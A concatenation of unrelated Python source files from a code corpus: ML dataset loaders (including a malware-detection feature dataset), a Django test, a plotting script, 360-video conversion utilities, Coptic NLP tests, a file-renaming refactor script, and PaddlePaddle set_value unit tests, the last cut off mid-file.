y = float(items[0])
for item in items[1:]:
k, v = item.split(':')
feature[int(k)] = int(v)
y_vec.append(y)
x_mat.append(feature)
return np.array(x_mat), np.array(y_vec)
def log_odds_vec(p):
# convert a probability to log-odds. Feel free to ignore the "divide by
# zero" warning since we deal with it manually. The extreme values are
# determined by looking at the histogram of the first-month data such
# that they do not deviate too far from the others
ind_0 = np.where(p == 0)[0]
ind_1 = np.where(p == 1)[0]
logodds = np.log(p) - np.log(1.-p)
logodds[ind_0] = -5
logodds[ind_1] = 4
return logodds
def read_data(valid, folder_name='./malware-dataset/'):
if valid:
# first month
xs, ys = get_monthly_data('./malware-dataset/2010-11.txt')
else:
file_names = ['2010-12.txt', '2011-01.txt', '2011-02.txt', '2011-03.txt', '2011-04.txt', '2011-05.txt', '2011-06.txt', '2011-07.txt', '2011-08.txt', '2011-09.txt', '2011-10.txt', '2011-11.txt', '2011-12.txt', '2012-01.txt', '2012-02.txt', '2012-03.txt', '2012-04.txt', '2012-05.txt', '2012-06.txt', '2012-07.txt', '2012-08.txt', '2012-09.txt', '2012-10.txt', '2012-11.txt', '2012-12.txt', '2013-01.txt', '2013-02.txt', '2013-03.txt', '2013-04.txt', '2013-05.txt', '2013-06.txt', '2013-07.txt', '2013-08.txt', '2013-09.txt', '2013-10.txt', '2013-11.txt', '2013-12.txt', '2014-01.txt', '2014-02.txt', '2014-03.txt', '2014-04.txt', '2014-05.txt', '2014-06.txt', '2014-07.txt'] # exclude '2010-11.txt'
xs, ys = [], []
for f in file_names:
x_mat, y_vec = get_monthly_data('./malware-dataset/' + f)
xs.append(x_mat)
ys.append(y_vec)
xs = np.concatenate(xs, axis=0)
ys = np.concatenate(ys)
x_train_set, y_train_set = xs[:-1], ys[:-1]
x_test_set, y_test_set = xs[1:], ys[1:]
y_train_set = log_odds_vec(y_train_set)
print('data size:', len(xs))
return x_train_set, y_train_set, x_test_set, y_test_set
return read_data(valid)
def get_elec2_dataset(valid=False):
def get_all_data(file_path='./electricity-price-dataset/electricity-normalized.csv',
num_feature=15):
''' 15 features in total:
- The first seven features are indicator of week days;
- The eighth feature is time
- The ninth feature is date
- The remaining five features: NSWprice, NSWdemand, VICprice, VICdemand, transfer
- The bias
'''
X, y, _y = [], [], []
with open(file_path, 'r') as datafile:
header = datafile.readline()
for line in datafile.readlines():
feature = [0] * num_feature
feature[-1] = 1 # bias term
items = line.split(',')
feature[int(items[1])-1] = 1 # day
feature[7] = float(items[2]) # time
feature[8] = float(items[0]) # date
fid = 9 # others
for item in items[3:-1]:
feature[fid] = float(item)
fid += 1
X.append(feature)
# y.append(float(items[3])) # target
# print(np.mean(y[-49:-1])<y[-1], items[-1])
_y.append(float(items[3]))
y_prob = np.sum(np.array(_y[-49:-1]) < _y[-1]) / len(_y[-49:-1])
y.append(y_prob)
# print(y_prob, items[-1])
# make it predict the future
X = X[49:]
y = y[49:]
num_instance = len(X)
print(f'Number of samples: {num_instance}')
return np.array(X), np.array(y)
def log_odds_vec(p):
# convert a probability to log-odds. Feel free to ignore the "divide by
# zero" warning since we deal with it manually. The extreme values are
# determined by looking at the histogram of the first-month data such
# that they do not deviate too far from the others
ind_0 = np.where(p == 0)[0]
ind_1 = np.where(p == 1)[0]
logodds = np.log(p) - np.log(1.-p)
logodds[ind_0] = -4
logodds[ind_1] = 4
return logodds
X, y = get_all_data()
log_odds = log_odds_vec(y)
val_size = 4000
if valid:
X = X[:val_size]
y = y[:val_size]
log_odds = log_odds[:val_size]
else:
X = X[val_size:]
y = y[val_size:]
log_odds = log_odds[val_size:]
x_train_set, y_train_set, x_test_set, y_test_set = X[:-1], log_odds[:-1], X[1:], y[1:]
return x_train_set, y_train_set, x_test_set, y_test_set
def get_sensordrift_dataset(valid=False):
def get_batch_data(file_path, num_feature=129):
'''`gas_class` - dict; args in {1,...,6}
`gas_class[i]` - dict; args in {'X', 'y'}
`gas_class[i][j]` - list
e.g., gas_class[2]['X']
'''
gas_class = {}
for i in range(1, 7):
gas_class[i] = {}
gas_class[i]['X'] = []
gas_class[i]['y'] = []
with open(file_path, 'r') as datafile:
for line in datafile:
feature = [0] * num_feature
feature[-1] = 1 # bias term
class_items = line.split(';')
X = gas_class[int(class_items[0])]['X']
y = gas_class[int(class_items[0])]['y']
items = class_items[1].strip().split()
y.append(float(items[0])) # concentration
for item in items[1:]:
k, v = item.split(':')
feature[int(k)-1] = float(v)
X.append(np.array(feature))
# summary
print(file_path)
for i in range(1, 7):
assert len(gas_class[i]['X']) == len(gas_class[i]['y'])
num_instance = len(gas_class[i]['X'])
print(f'class{i}: {num_instance} samples')
return gas_class
class_id = 2
gas_class = get_batch_data('./sensor-drift-dataset/batch1.dat') # validation
X, y = gas_class[class_id]['X'], gas_class[class_id]['y']
mu_x = np.mean(X, axis=0, keepdims=True)
mu_x[0, -1] = 0
scale_x = np.std(X, axis=0, keepdims=True)
scale_x[0, -1] = 1
mu_y = np.mean(y)
scale_y = np.std(y)
def scaling_x(x):
return (x-mu_x)/scale_x
def scaling_y(y):
return (y-mu_y)/scale_y
if valid:
X = scaling_x(X)
y = scaling_y(y)
else:
file_names = ['batch2.dat',
'batch3.dat',
'batch4.dat',
'batch5.dat',
'batch6.dat',
'batch7.dat',
'batch8.dat',
'batch9.dat',
'batch10.dat']
X, y = [], []
for file_name in file_names:
gas_class = get_batch_data('./sensor-drift-dataset/'+file_name)
X.append(gas_class[class_id]['X'])
y.append(gas_class[class_id]['y'])
X = np.concatenate(X, axis=0)
y = np.concatenate(y, axis=0)
X = scaling_x(X)
y = scaling_y(y)
x_train_set, y_train_set, x_test_set, y_test_set = X[:-1], y[:-1], X[1:], y[1:]
return x_train_set, y_train_set, x_test_set, y_test_set | StarcoderdataPython |
28163 | <gh_stars>1-10
from django.core.exceptions import ValidationError
from django.test import TestCase
from django_analyses.models.input.types.input_types import InputTypes
from tests.factories.input.types.file_input import FileInputFactory
class FileInputTestCase(TestCase):
"""
Tests for the :class:`~django_analyses.models.input.types.file_input.FileInput` model.
"""
def setUp(self):
"""
Adds the created instances to the tests' contexts.
For more information see unittest's :meth:`~unittest.TestCase.setUp` method.
"""
self.file_input = FileInputFactory()
###########
# Methods #
###########
def test_string(self):
value = str(self.file_input)
expected = f"'{self.file_input.key}' = {self.file_input.value}"
self.assertEqual(value, expected)
def test_none_value_if_required_raises_validation_error(self):
self.file_input.definition.required = True
self.file_input.definition.save()
self.file_input.value = None
with self.assertRaises(ValidationError):
self.file_input.save()
def test_get_type(self):
value = self.file_input.get_type()
self.assertEqual(value, InputTypes.FIL)
| StarcoderdataPython |
116371 | import matplotlib.pyplot as plt
import numpy
import argparse
import json
import socket
def get_args():
parser = argparse.ArgumentParser(
description='Charcoal Dryrot Generate result plots.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-e',
'--exp',
help='The name of the experiment',
metavar='exp',
required=True)
return parser.parse_args()
def load_config(path):
with open(path,"r") as f:
config = json.load(f)
host_name = socket.gethostname()
if "hpc" in host_name:
host_name = "hpc"
return config[host_name]
def load_results(path):
with open(path,'r') as f:
results = json.load(f)
return results
def main():
args = get_args()
config = load_config("../config.json")
result = load_results('{0}/results_{1}.json'.format(config['results'],args.exp))
plt.plot(result['results']['loss'],'r--',label='Training')
plt.plot(result['results']['val_loss'],'b--',label='Validation')
plt.legend()
plt.ylabel('Cross Entropy Loss')
plt.xlabel('Epochs')
plt.title("Training and Validation Losses")
plt.savefig('{0}/losses_{1}'.format(config['plots'],args.exp))
plt.clf()
plt.close()
plt.plot(result['results']['accuracy'],'r--',label='Training')
plt.plot(result['results']['val_accuracy'],'b--',label='Validation')
plt.legend()
plt.ylabel('Accuracy')
plt.xlabel('Epochs')
plt.title("Training and Validation Accuracies")
plt.savefig('{0}/accuracies_{1}'.format(config['plots'],args.exp))
plt.clf()
plt.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
3363870 | import os, sys
import numpy as np
from pyutils.cmd import runSystemCMD
from scipy.interpolate import RegularGridInterpolator
sys.path.insert(0, '3rd-party/vrProjector/')
import vrProjector
def dir2samples(path):
files = os.listdir(path)
files = [fn for fn in files if len(fn.split('.')) and fn.split('.')[-1] in ('webm', 'mp4', 'mkv', 'm4a')]
files = [fn for fn in files if fn != 'downloaded.txt']
youtube_ids = [fn.split('.')[0] for fn in files]
samples = {yid: [] for yid in youtube_ids}
for yid, fn in zip(youtube_ids, files):
samples[yid].append(os.path.join(path, fn))
return samples, samples.keys()
def nonZeroChannels(inp_fn):
from scipy.io import wavfile
sndfile = '/tmp/output.wav'
cmd = 'ffmpeg -y -t 300 -i {} -map a -ar 10000 {}'.format(inp_fn, sndfile)
out, stderr = runSystemCMD(cmd)
if any([l.startswith('Output file is empty') for l in stderr.split('\n')]):
raise ValueError('ERROR: Output file is empty\nCMD: {}\n STDERR: {}'.format(cmd, stderr))
fs, data = wavfile.read(sndfile)
os.remove(sndfile)
return (data != 0).sum(axis=0) > 0
def extract_clip(inp_fn, out_fn, rate=10, seek=None, duration=None):
cmd = ['ffmpeg', '-y']
if seek is not None:
cmd += ['-ss', '{0:.10f}'.format(seek)]
cmd += ['-i', inp_fn]
if duration is not None:
cmd += ['-t', '{0:.10f}'.format(duration)]
cmd += ['-an',
'-vf', 'scale=720:360',
'-r', str(rate),
'-vcodec', 'libx264',
'-crf', '5',
out_fn]
stdout, stderr = runSystemCMD(' '.join(cmd))
if any([l.startswith('Output file is empty,')
for l in stderr.split('\n')]):
raise ValueError, 'Output file is empty.\n' + stderr
def my_interp2(data, x, y, pts):
if data.ndim == 2:
interp = RegularGridInterpolator((y, x), data, bounds_error=False, method='linear')
return interp(pts)
elif data.ndim == 3:
out = []
for i in range(data.shape[2]):
interp = RegularGridInterpolator((y, x), data[:, :, i], bounds_error=False, method='linear')
out.append(interp(pts))
return np.stack(out, axis=-1)
def my_imresize(data, shape):
dshape = data.shape
assert data.ndim >= len(shape)
dx = np.arange(dshape[1])/float(dshape[1])
dy = np.arange(dshape[0])/float(dshape[0])
dx_grid_n, dy_grid_n = np.meshgrid(range(shape[1]), range(shape[0]))
dx_grid_n, dy_grid_n = dx_grid_n/float(shape[1]), dy_grid_n/float(shape[0])
pts = np.stack((dy_grid_n.reshape(-1), dx_grid_n.reshape(-1)), axis=1)
if len(dshape) == 2:
data = data.reshape(dshape+(1,))
if len(dshape) > 3:
data = data.reshape(dshape[:2]+np.prod(dshape[2:]))
outp = my_interp2(data, dx, dy, pts)
if len(dshape) == 2:
outp = outp[:, :, 0]
else:
outp = outp.reshape(shape[:2]+dshape[2:])
return outp
def unwarp_eac(face):
dims = face.shape
x = np.arange(dims[1])/float(dims[1]-1)-0.5
y = np.arange(dims[0])/float(dims[0]-1)-0.5
x_grid, y_grid = np.meshgrid(x, y)
x_new = np.arctan(2*x_grid)*2/np.pi
y_new = np.arctan(2*y_grid)*2/np.pi
pts = np.stack((y_new.reshape(-1), x_new.reshape(-1)), axis=1)
new_img = my_interp2(face, x, y, pts).reshape(dims)
new_img[np.isnan(new_img)] = 0
return new_img
def cub2eqr(left, front, right, top, back, bottom, width=720, height=360, dtype=np.uint8):
source = vrProjector.CubemapProjection()
source.setImages(front, right, back, left, top, bottom)
source.set_use_bilinear(True)
out = vrProjector.EquirectangularProjection()
out.initImage(width, height, dtype=dtype)
out.reprojectToThis(source)
return out.image
def gen_eac2eqr_maps(eac_shape, eqr_shape, stereopsis='MONO'):
# Input grids
xgrid, ygrid = np.meshgrid(range(eac_shape[1]), range(eac_shape[0]))
eac_grid = np.stack((xgrid, ygrid), axis=2)
# Grab 1st stereo channel only
if stereopsis == 'STEREO':
eac_grid = np.rot90(eac_grid[:, :eac_shape[1]/2, :], -1)
# Split faces
hs = eac_grid.shape[0]/2
ws = eac_grid.shape[1]/3
face_dims = (min(hs, ws), min(hs, ws))
faces = ['left', 'front', 'right', 'top', 'back', 'bottom']
eac_grid = {'left': my_imresize(eac_grid[:hs, :ws, :], face_dims),
'front': my_imresize(eac_grid[:hs, ws:2*ws, :], face_dims),
'right': my_imresize(eac_grid[:hs, 2*ws:, :], face_dims),
'bottom': my_imresize(np.rot90(eac_grid[hs:, :ws, :], -1), face_dims),
'back': my_imresize(np.rot90(eac_grid[hs:, ws:2*ws, :]), face_dims),
'top': my_imresize(np.rot90(eac_grid[hs:, 2*ws:, :], -1), face_dims)}
# EAC to CubeMap
cub_grid = {f: unwarp_eac(eac_grid[f]) for f in faces}
cub_grid = {f: np.pad(cub_grid[f], ((0, 0), (0, 0), (0, 1)), 'constant') for f in faces}
# CubeMap to EquiRect
eqr_grid = cub2eqr(width=eqr_shape[1], height=eqr_shape[0], dtype=np.float32, **cub_grid)
xmap, ymap = eqr_grid[:, :, 0], eqr_grid[:, :, 1]
return xmap, ymap
def save_pgm(fp, map, mmax):
height, width = map.shape[:2]
fp.write('P2\n{} {}\n{}\n'.format(width, height, mmax))
for i in range(height):
fp.write(' '.join([str(num) for num in map[i, :]])+'\n')
| StarcoderdataPython |
156850 | """Unit tests for Coptic NLP"""
import io, re, os, sys
from collections import defaultdict
from six import iterkeys
script_dir = os.path.dirname(os.path.realpath(__file__)) + os.sep
data_dir = script_dir + "data" + os.sep
lib_dir = script_dir + "lib" + os.sep
from coptic_nlp import nlp_coptic
from lib.stacked_tokenizer import StackedTokenizer
PY3 = sys.version_info[0] == 3
class CopticTest:
def __init__(self):
self.tests = defaultdict(list)
self.total = 0
self.success = 0
def add_test(self,data,expected_out,flags,comment):
self.tests[flags].append((data,expected_out,comment))
def run_tests(self):
stk = StackedTokenizer(pipes=True,
segment_merged=False, detok=0, ambig=data_dir + "ambig.tab")
for test in sorted(list(iterkeys(self.tests))):
sys.stderr.write("o Testing configuration: " + test + "\n")
all_inputs = ""
for tup in self.tests[test]:
data, _, _ = tup
if not data.endswith("_"):
data = data.strip()+"_"
all_inputs += data + "\n"
flags = test.strip().split(" ")
sgml_mode = "pipes" if "pipes" in flags else "sgml"
if sgml_mode == "pipes":
stk.pipes = True
else:
stk.pipes = False
tok_mode = "from_pipes" if "from_pipes" in flags else "auto"
if tok_mode == "from_pipes":
stk.tokenized = True
else:
stk.tokenized = False
detokenize = 0
norm = multiword = tag = lemma = etym = unary = parse = False
if "-penmult" in flags:
norm = multiword = tag = lemma = etym = unary = parse = True
if "-enult" in flags:
norm = tag = lemma = etym = True
if "-d" in flags:
aggressive = False
if "1" in flags:
detokenize = 1
elif "2" in flags:
detokenize = 2
aggressive = True
elif "3" in flags:
detokenize = 3
stk.detokenize = detokenize
stk.load_detokenizer(aggressive=aggressive)
segment_merged = False
nlp_resp = nlp_coptic(all_inputs, do_tok=True,
do_norm=norm, do_mwe=multiword, do_tag=tag, do_lemma=lemma,
do_lang=etym, do_milestone=unary, do_parse=parse, sgml_mode=sgml_mode,
tok_mode=tok_mode, preloaded=stk,
detokenize=detokenize,
segment_merged=segment_merged)
for tup in self.tests[test]:
_, expected, comment = tup
self.total += 1
self.success += self.compare(nlp_resp,expected,comment)
sys.stderr.write("\nFinished " + str(self.total) + " tests (" + str(self.success)+"/" + str(self.total) +" successful)\n")
def compare(self,response,expected,comment):
if len(comment) > 0:
sys.stderr.write("\t" + comment + "\n")
if expected in response:
sys.stderr.write("\t\tPASS\n")
return 1
else:
sys.stderr.write("\t\tFAIL (expected: "+ expected + ")\n")
return 0
lines = io.open(data_dir+"tests.dat",encoding="utf8").read().strip()
lines = re.sub(r"\t+","\t",lines)
lines = lines.split("\n")
t = CopticTest()
comment = ""
flags = "-o pipes"
for line in lines:
if line.strip().startswith("#"):
comment = line.replace("#","").strip()
elif "\t" in line:
fields = line.strip().split("\t")
if fields[0].strip().startswith("flags"):
flags = fields[1].strip()
else:
t.add_test(fields[0].strip(),fields[1].strip(),flags=flags,comment=comment)
comment = ""
t.run_tests()
| StarcoderdataPython |
142031 | import ui
from os import getcwd, listdir, mkdir, rename
from os.path import isdir, join
from threading import Thread
from random import choice
from time import sleep
leidos = 0
cambiados = 0
finish = False
def map_dirs(directory=getcwd()):
_map = []
for file in listdir(directory):
_map.append(join(directory, file))
if isdir(join(directory, file)):
_map += map_dirs(join(directory, file))
return _map
def not_equal(parameters: list):
file, new_file, location, file_name, import_name, new_import_name, old, new = parameters
changes = False
data = open(file, 'r').read()
if 'import {}'.format(import_name) in data:
if 'import {} as ' not in data:
data = data.replace(import_name, new_import_name)
changes = True
if changes:
f = open(file,'w')
f.write(data)
f.close()
return 1
return 0
def equal(parameters: list):
file, new_file, location, file_name, import_name, new_import_name, old, new = parameters
rename(file, new_file)
return 1
def determine_equality(file, old, new):
splited_file = file.split('/')
location = '/'.join(splited_file[:-1])
new_file = join(location, new)
file_name = splited_file[-1]
import_name = old.split('.')[0]
new_import_name = new.split('.')[0]
parameters = [
file, new_file, location, file_name, import_name, new_import_name, old, new
]
if file_name == old:
value = equal(parameters)
else:
if not isdir(file):
value = not_equal(parameters)
else:
value = 0
return value
def Tread_for_determine_equality(file, old, new):
global cambiados
cambiados += determine_equality(file, old, new)
def refractor(_map, old, new):
global leidos
for file in _map:
leidos += 1
Thread(target=Tread_for_determine_equality, args=(file, old, new)).start()
sleep(0.2)
def update_labels(len_map):
global leidos, cambiados, finish
while not finish:
v['label1'].text = str(leidos)
v['label2'].text = str(cambiados)
if leidos == len_map:
finish = True
def start(sender):
sender.enabled = False
directory = join(getcwd(), v['textfield3'].text)
old, new = v['textfield1'].text, v['textfield2'].text
_map = map_dirs(directory)
Thread(target=update_labels, args=(_map, )).start()
Thread(target=refractor, args=(_map, old, new)).start()
try:
v = ui.load_view('refactor.pyui')
v.present()
except KeyboardInterrupt:
print('bye')
finish = True
| StarcoderdataPython |
3273005 | #!/usr/bin/env python3
t = sorted([int(round(100*float(x))) for x in input().split()])
o = int(round(100*float(input())))
best = (t[0] + t[1] + t[2])
worst = (t[1] + t[2] + t[3])
if 3*o < best: print('impossible')
elif 3*o >= worst: print('infinite')
else: print(f'{(3*o-t[1]-t[2])/100.:.2f}')
| StarcoderdataPython |
3351166 | <filename>python/paddle/fluid/tests/unittests/test_set_value_op.py<gh_stars>1-10
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Test set_value op in static mode
from __future__ import print_function
import unittest
import numpy as np
import paddle
from paddle.fluid.layer_helper import LayerHelper
from functools import reduce
class TestSetValueBase(unittest.TestCase):
def setUp(self):
paddle.enable_static()
self.set_dtype()
self.set_value()
self.set_shape()
self.data = np.ones(self.shape).astype(self.dtype)
self.program = paddle.static.Program()
def set_shape(self):
self.shape = [2, 3, 4]
def set_value(self):
self.value = 6
def set_dtype(self):
self.dtype = "float32"
def _call_setitem(self, x):
x[0, 0] = self.value
def _get_answer(self):
self.data[0, 0] = self.value
class TestSetValueApi(TestSetValueBase):
def _run_static(self):
paddle.enable_static()
with paddle.static.program_guard(self.program):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
self._call_setitem(x)
exe = paddle.static.Executor(paddle.CPUPlace())
out = exe.run(self.program, fetch_list=[x])
paddle.disable_static()
return out
def _run_dynamic(self):
paddle.disable_static()
x = paddle.ones(shape=self.shape, dtype=self.dtype)
self._call_setitem(x)
out = x.numpy()
paddle.enable_static()
return out
def test_api(self):
static_out = self._run_static()
dynamic_out = self._run_dynamic()
self._get_answer()
error_msg = "\nIn {} mode: \nExpected res = \n{}, \n\nbut received : \n{}"
self.assertTrue(
(self.data == static_out).all(),
msg=error_msg.format("static", self.data, static_out))
self.assertTrue(
(self.data == dynamic_out).all(),
msg=error_msg.format("dynamic", self.data, dynamic_out))
# 1. Test different type of item: int, Python slice, Paddle Tensor
# 1.1 item is int
class TestSetValueItemInt(TestSetValueApi):
def _call_setitem(self, x):
x[0] = self.value
def _get_answer(self):
self.data[0] = self.value
# 1.2 item is slice
# 1.2.1 step is 1
class TestSetValueItemSlice(TestSetValueApi):
def _call_setitem(self, x):
x[0:2] = self.value
def _get_answer(self):
self.data[0:2] = self.value
class TestSetValueItemSlice2(TestSetValueApi):
def _call_setitem(self, x):
x[0:-1] = self.value
def _get_answer(self):
self.data[0:-1] = self.value
class TestSetValueItemSlice3(TestSetValueApi):
def _call_setitem(self, x):
x[0:-1, 0:2] = self.value
def _get_answer(self):
self.data[0:-1, 0:2] = self.value
class TestSetValueItemSlice4(TestSetValueApi):
def _call_setitem(self, x):
x[0:, 1:2, :] = self.value
def _get_answer(self):
self.data[0:, 1:2, :] = self.value
class TestSetValueItemSlice5(TestSetValueApi):
def _call_setitem(self, x):
x[0:, 1:1, :] = self.value
def _get_answer(self):
self.data[0:, 1:1, :] = self.value
class TestSetValueItemSliceInWhile(TestSetValueApi):
def _call_setitem(self, x):
def cond(i, x):
return i < 1
def body(i, x):
x[i] = self.value
i = i + 1
return i, x
i = paddle.zeros(shape=(1, ), dtype='int32')
i, x = paddle.fluid.layers.while_loop(cond, body, [i, x])
def _get_answer(self):
self.data[0] = self.value
# 1.2.2 step > 1
class TestSetValueItemSliceStep(TestSetValueApi):
def set_shape(self):
self.shape = [5, 5, 5]
def _call_setitem(self, x):
x[0:2:2] = self.value
def _get_answer(self):
self.data[0:2:2] = self.value
class TestSetValueItemSliceStep2(TestSetValueApi):
def set_shape(self):
self.shape = [7, 5, 5]
def _call_setitem(self, x):
x[0:-1:3] = self.value
def _get_answer(self):
self.data[0:-1:3] = self.value
class TestSetValueItemSliceStep3(TestSetValueApi):
def _call_setitem(self, x):
x[0:-1, 0:2, ::2] = self.value
def _get_answer(self):
self.data[0:-1, 0:2, ::2] = self.value
class TestSetValueItemSliceStep4(TestSetValueApi):
def _call_setitem(self, x):
x[0:, 1:2:2, :] = self.value
def _get_answer(self):
self.data[0:, 1:2:2, :] = self.value
# 1.2.3 step < 0
class TestSetValueItemSliceNegetiveStep(TestSetValueApi):
def set_shape(self):
self.shape = [5, 2]
def set_value(self):
self.value = np.array([3, 4])
def _call_setitem(self, x):
x[5:2:-1] = self.value
def _get_answer(self):
self.data[5:2:-1] = self.value
class TestSetValueItemSliceNegetiveStep2(TestSetValueApi):
def set_shape(self):
self.shape = [5]
def set_value(self):
self.value = np.array([3, 4])
def _call_setitem(self, x):
x[1::-1] = self.value
def _get_answer(self):
self.data[1::-1] = self.value
class TestSetValueItemSliceNegetiveStep3(TestSetValueApi):
def set_shape(self):
self.shape = [3]
def set_value(self):
self.value = np.array([3, 4, 5])
def _call_setitem(self, x):
x[::-1] = self.value
def _get_answer(self):
self.data[::-1] = self.value
class TestSetValueItemSliceNegetiveStep4(TestSetValueApi):
def set_shape(self):
self.shape = [3, 4, 5]
def _call_setitem(self, x):
x[2:0:-1, 0:2, ::-1] = self.value
def _get_answer(self):
self.data[2:0:-1, 0:2, ::-1] = self.value
# 1.3 item is Ellipsis
class TestSetValueItemEllipsis1(TestSetValueApi):
def _call_setitem(self, x):
x[0:, ..., 1:] = self.value
def _get_answer(self):
self.data[0:, ..., 1:] = self.value
class TestSetValueItemEllipsis2(TestSetValueApi):
def _call_setitem(self, x):
x[0:, ...] = self.value
def _get_answer(self):
self.data[0:, ...] = self.value
class TestSetValueItemEllipsis3(TestSetValueApi):
def _call_setitem(self, x):
x[..., 1:] = self.value
def _get_answer(self):
self.data[..., 1:] = self.value
class TestSetValueItemEllipsis4(TestSetValueApi):
def _call_setitem(self, x):
x[...] = self.value
def _get_answer(self):
self.data[...] = self.value
# 1.4 item is Paddle Tensor
class TestSetValueItemTensor(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
x[zero] = self.value
def _get_answer(self):
self.data[0] = self.value
class TestSetValueItemTensor2(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[zero:two] = self.value
def _get_answer(self):
self.data[0:2] = self.value
class TestSetValueItemTensor3(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[zero:-1, 0:two] = self.value
def _get_answer(self):
self.data[0:-1, 0:2] = self.value
class TestSetValueItemTensor4(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[0:-1, zero:2, 0:6:two] = self.value
def _get_answer(self):
self.data[0:-1, 0:2, ::2] = self.value
class TestSetValueItemTensor5(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[zero:, 1:2:two, :] = self.value
def _get_answer(self):
self.data[0:, 1:2:2, :] = self.value
class TestSetValueItemTensor6(TestSetValueApi):
def set_shape(self):
self.shape = [3, 4, 5]
def _call_setitem(self, x):
minus1 = paddle.full([1], -1, dtype="int32")
zero = paddle.full([1], 0, dtype="int32")
x[2:zero:minus1, 0:2, 10:-6:minus1] = self.value
def _get_answer(self):
self.data[2:0:-1, 0:2, ::-1] = self.value
# 1.5 item is None
class TestSetValueItemNone1(TestSetValueApi):
def _call_setitem(self, x):
x[None] = self.value
def _get_answer(self):
self.data[None] = self.value
class TestSetValueItemNone2(TestSetValueApi):
def _call_setitem(self, x):
x[0, None, 1] = self.value
def _get_answer(self):
self.data[0, None, 1] = self.value
class TestSetValueItemNone3(TestSetValueApi):
def _call_setitem(self, x):
x[:, None, None, 1] = self.value
def _get_answer(self):
self.data[:, None, None, 1] = self.value
class TestSetValueItemNone4(TestSetValueApi):
def _call_setitem(self, x):
x[0, 0, None, 1] = self.value
def _get_answer(self):
self.data[0, 0, None, 1] = self.value
class TestSetValueItemNone5(TestSetValueApi):
def _call_setitem(self, x):
x[0, None, 0, None, 1] = self.value
def _get_answer(self):
self.data[0, None, 0, None, 1] = self.value
class TestSetValueItemNone6(TestSetValueApi):
def _call_setitem(self, x):
x[None, 0, 0, None, 0] = self.value
def _get_answer(self):
self.data[None, 0, 0, None, 0] = self.value
class TestSetValueItemNone7(TestSetValueApi):
def _call_setitem(self, x):
x[:, None, 1] = np.zeros(self.shape)[:, None, 0]
def _get_answer(self):
self.data[:, None, 1] = np.zeros(self.shape)[:, None, 0]
class TestSetValueItemNone8(TestSetValueApi):
def _call_setitem(self, x):
x[:, 1, None] = np.zeros(self.shape)[:, 0, None]
def _get_answer(self):
self.data[:, 1, None] = np.zeros(self.shape)[:, 0, None]
class TestSetValueItemNone9(TestSetValueApi):
def _call_setitem(self, x):
x[None, :, 1, ..., None] = np.zeros(self.shape)[0, 0, :, None]
def _get_answer(self):
self.data[None, :, 1, ..., None] = np.zeros(self.shape)[0, 0, :, None]
class TestSetValueItemNone10(TestSetValueApi):
def _call_setitem(self, x):
x[..., None, :, None] = np.zeros(self.shape)[..., None, :, None]
def _get_answer(self):
self.data[..., None, :, None] = np.zeros(self.shape)[..., None, :, None]
# 1.5 item is list or Tensor of bol
class TestSetValueItemBool1(TestSetValueApi):
def _call_setitem(self, x):
x[[True, False]] = self.value
def _get_answer(self):
self.data[[True, False]] = self.value
class TestSetValueItemBool2(TestSetValueApi):
def _call_setitem(self, x):
x[[False, False]] = self.value
def _get_answer(self):
self.data[[False, False]] = self.value
class TestSetValueItemBool3(TestSetValueApi):
def _call_setitem(self, x):
x[[False, True]] = np.zeros(self.shape[2])
def _get_answer(self):
self.data[[False, True]] = np.zeros(self.shape[2])
class TestSetValueItemBool4(TestSetValueApi):
def _call_setitem(self, x):
idx = paddle.assign(np.array([False, True]))
x[idx] = np.zeros(self.shape[2])
def _get_answer(self):
self.data[np.array([False, True])] = np.zeros(self.shape[2])
class TestSetValueItemBool5(TestSetValueApi):
def _call_setitem(self, x):
idx = paddle.assign(
np.array([[False, True, False], [True, True, False]]))
x[idx] = self.value
def _get_answer(self):
self.data[np.array([[False, True, False], [True, True, False]
])] = self.value
class TestSetValueItemBool6(TestSetValueApi):
def _call_setitem(self, x):
x[0, ...] = 0
x[x > 0] = self.value
def _get_answer(self):
self.data[0, ...] = 0
self.data[self.data > 0] = self.value
# 2. Test different type of value: int, float, numpy.ndarray, Tensor
# 2.1 value is int32, int64, float32, float64, bool
def create_test_value_int32(parent):
class TestValueInt(parent):
def set_value(self):
self.value = 7
def set_dtype(self):
self.dtype = "int32"
cls_name = "{0}_{1}".format(parent.__name__, "ValueInt32")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_int32(TestSetValueItemInt)
create_test_value_int32(TestSetValueItemSlice)
create_test_value_int32(TestSetValueItemSlice2)
create_test_value_int32(TestSetValueItemSlice3)
create_test_value_int32(TestSetValueItemSlice4)
def create_test_value_int64(parent):
class TestValueInt(parent):
def set_value(self):
self.value = 7
def set_dtype(self):
self.dtype = "int64"
cls_name = "{0}_{1}".format(parent.__name__, "ValueInt64")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_int64(TestSetValueItemInt)
create_test_value_int64(TestSetValueItemSlice)
create_test_value_int64(TestSetValueItemSlice2)
create_test_value_int64(TestSetValueItemSlice3)
create_test_value_int64(TestSetValueItemSlice4)
def create_test_value_fp32(parent):
class TestValueInt(parent):
def set_value(self):
self.value = 3.3
def set_dtype(self):
self.dtype = "float32"
cls_name = "{0}_{1}".format(parent.__name__, "ValueFp32")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_fp32(TestSetValueItemInt)
create_test_value_fp32(TestSetValueItemSlice)
